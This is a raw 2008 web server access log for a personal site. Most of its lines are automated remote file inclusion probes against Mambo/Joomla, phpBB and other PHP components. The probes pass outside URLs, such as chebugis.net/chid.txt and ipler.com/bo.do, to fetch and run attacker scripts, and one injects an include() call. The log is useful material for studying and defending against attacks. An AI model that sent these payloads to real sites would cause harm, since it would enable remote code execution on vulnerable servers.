74.6.18.225 - - [20/Sep/2008:09:52:43 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:09 -0700] "GET /logs/access_080424.log/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:10 -0700] "GET /logs/access_080425.log/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:10 -0700] "GET /logs/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:15 -0700] "GET /index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92476 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:15 -0700] "GET /logs/access_080424.log/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:15 -0700] "GET /logs/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:15 -0700] "GET /logs/access_080425.log/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:53:16 -0700] "GET /index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92460 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:53:35 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:53:36 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:54:46 -0700] "GET /logs/access_080424.log/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:54:46 -0700] "GET /logs/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:54:48 -0700] "GET /index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92476 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:54:50 -0700] "GET /logs/access_080608.log/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:55:08 -0700] "GET /logs/access_080629.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:55:09 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:55:09 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:55:13 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:55:18 -0700] "GET /logs/access_080321.log//phplive/setup/header.php?css_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:55:19 -0700] "GET //phplive/setup/header.php?css_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:55:19 -0700] "GET /logs//phplive/setup/header.php?css_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [20/Sep/2008:09:55:36 -0700] "GET /logs/access_080824.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [20/Sep/2008:09:56:21 -0700] "GET /logs/access_080714.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.102.21.109 - - [20/Sep/2008:09:56:32 -0700] "GET /logs/access_080822.log/?func=http://escortreview.com/_notes/index.php/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.102.21.109 - - [20/Sep/2008:09:56:33 -0700] "GET /?func=http://escortreview.com/_notes/index.php/boo.do?? HTTP/1.1" 200 92271 "-" "libwww-perl/5.810" "www.dmulk.com"
75.102.21.109 - - [20/Sep/2008:09:56:34 -0700] "GET /logs/?func=http://escortreview.com/_notes/index.php/boo.do?? HTTP/1.1" 200 65877 "-" "libwww-perl/5.810" "www.dmulk.com"
207.99.69.218 - - [20/Sep/2008:09:56:55 -0700] "GET /logs//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://www.marketingsolutionsltd.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.99.69.218 - - [20/Sep/2008:09:56:55 -0700] "GET /logs/access_080527.log//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://www.marketingsolutionsltd.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.99.69.218 - - [20/Sep/2008:09:56:55 -0700] "GET //server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://www.marketingsolutionsltd.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.58.20.66 - - [20/Sep/2008:09:57:01 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:09:57:07 -0700] "GET /logs/access_080527.log//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:09:57:07 -0700] "GET /logs//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:09:57:07 -0700] "GET //server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:57:18 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:57:18 -0700] "GET /logs/access_080621.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:57:20 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 200 92941 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.193.46 - - [20/Sep/2008:09:57:43 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.112.193.46 - - [20/Sep/2008:09:57:43 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 200 92541 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:09:58:18 -0700] "GET /logs//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:09:58:18 -0700] "GET /logs/access_080527.log//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:09:58:18 -0700] "GET //server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.103 - - [20/Sep/2008:09:58:20 -0700] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/trackback/ HTTP/1.0" 200 9735 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
193.252.149.15 - - [20/Sep/2008:09:58:30 -0700] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
91.193.20.45 - - [20/Sep/2008:09:59:04 -0700] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
91.193.20.45 - - [20/Sep/2008:09:59:05 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 200 92526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.6.18.225 - - [20/Sep/2008:10:00:33 -0700] "GET /bikes/dteel/2008_08_17/?S=A HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:00:49 -0700] "GET /logs/access_080820.log//////////?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:00:49 -0700] "GET //////////?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92481 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:00:50 -0700] "GET /logs//////////?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 65890 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:00:52 -0700] "GET /logs/access_080905.log//////////?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.90 - - [20/Sep/2008:10:00:57 -0700] "GET /logs/access_071228.log//footer.php?footer_file=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:31 -0700] "GET /logs/access_080706.log/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:31 -0700] "GET /includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:31 -0700] "GET /logs/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:32 -0700] "GET /logs/access_080613.log/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:01:45 -0700] "GET /logs/access_080527.log//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:01:45 -0700] "GET //server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:01:50 -0700] "GET /logs//server_stats/basedir/components/com_mospray/lang/$lang/admin.php=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:10:01:51 -0700] "GET /logs/access_080102.log//skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:01:53 -0700] "GET /logs/access_080826.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:01:53 -0700] "GET /logs/access_080524.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:54 -0700] "GET /logs/access_080706.log/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:54 -0700] "GET /logs/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:56 -0700] "GET /logs/access_080613.log/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:01:56 -0700] "GET /includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [20/Sep/2008:10:02:49 -0700] "GET /logs/access_080807.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:02:56 -0700] "GET /logs/access_080613.log%20/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:02:56 -0700] "GET /logs/access_080706.log%20/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:03:23 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:03:23 -0700] "GET /logs/access_071223.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:03:23 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:03:23 -0700] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:03:32 -0700] "GET /logs/access_080706.log%20/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [20/Sep/2008:10:03:32 -0700] "GET /logs/access_080613.log%20/includes/functions.visohotlink.php?mosConfig_absolute_path=http://www.ellinotopos.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:03:33 -0700] "GET /logs/access_080826.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:03:38 -0700] "GET /logs/access_080524.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:03:41 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&162 HTTP/1.1" 200 188120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:03:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0059.jpg HTTP/1.1" 200 418326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
205.234.198.174 - - [20/Sep/2008:10:03:54 -0700] "GET /logs/access_071223.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [20/Sep/2008:10:03:54 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [20/Sep/2008:10:03:54 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:03:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-074_0.jpg HTTP/1.1" 200 559939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
205.234.198.174 - - [20/Sep/2008:10:03:57 -0700] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:03:58 -0700] "GET /logs/access_080626.log/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:03:58 -0700] "GET /logs/access_080626.log/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:04:00 -0700] "GET /index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 92321 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:04:00 -0700] "GET /index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 92305 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:04:01 -0700] "GET /logs/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:04:02 -0700] "GET /logs/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:04:10 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0007.jpg HTTP/1.1" 200 413075 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:04:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-016_0.jpg HTTP/1.1" 200 249317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:04:26 -0700] "GET /logs/access_071223.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:04:26 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:04:26 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:04:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0109.jpg HTTP/1.1" 200 364454 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:04:46 -0700] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:04:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-227.jpg HTTP/1.1" 200 468270 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.223.100.182 - - [20/Sep/2008:10:05:01 -0700] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.223.100.182 - - [20/Sep/2008:10:05:03 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92700 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:05:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-112_0.jpg HTTP/1.1" 200 506250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
75.102.21.109 - - [20/Sep/2008:10:05:16 -0700] "GET /logs/access_080320.log/?func=http://escortreview.com/_notes/index.php/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:05:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-198.jpg HTTP/1.1" 200 376218 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:05:26 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:05:27 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:05:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_2.jpg HTTP/1.1" 200 427285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
195.58.20.66 - - [20/Sep/2008:10:05:41 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:05:43 -0700] "GET /logs/access_080811.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:05:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-130_0.jpg HTTP/1.1" 200 505222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
222.122.141.75 - - [20/Sep/2008:10:05:54 -0700] "GET /logs/access_080504.log/index.php?var=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.75 - - [20/Sep/2008:10:05:56 -0700] "GET /index.php?var=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 200 92286 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:05:56 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:05:59 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
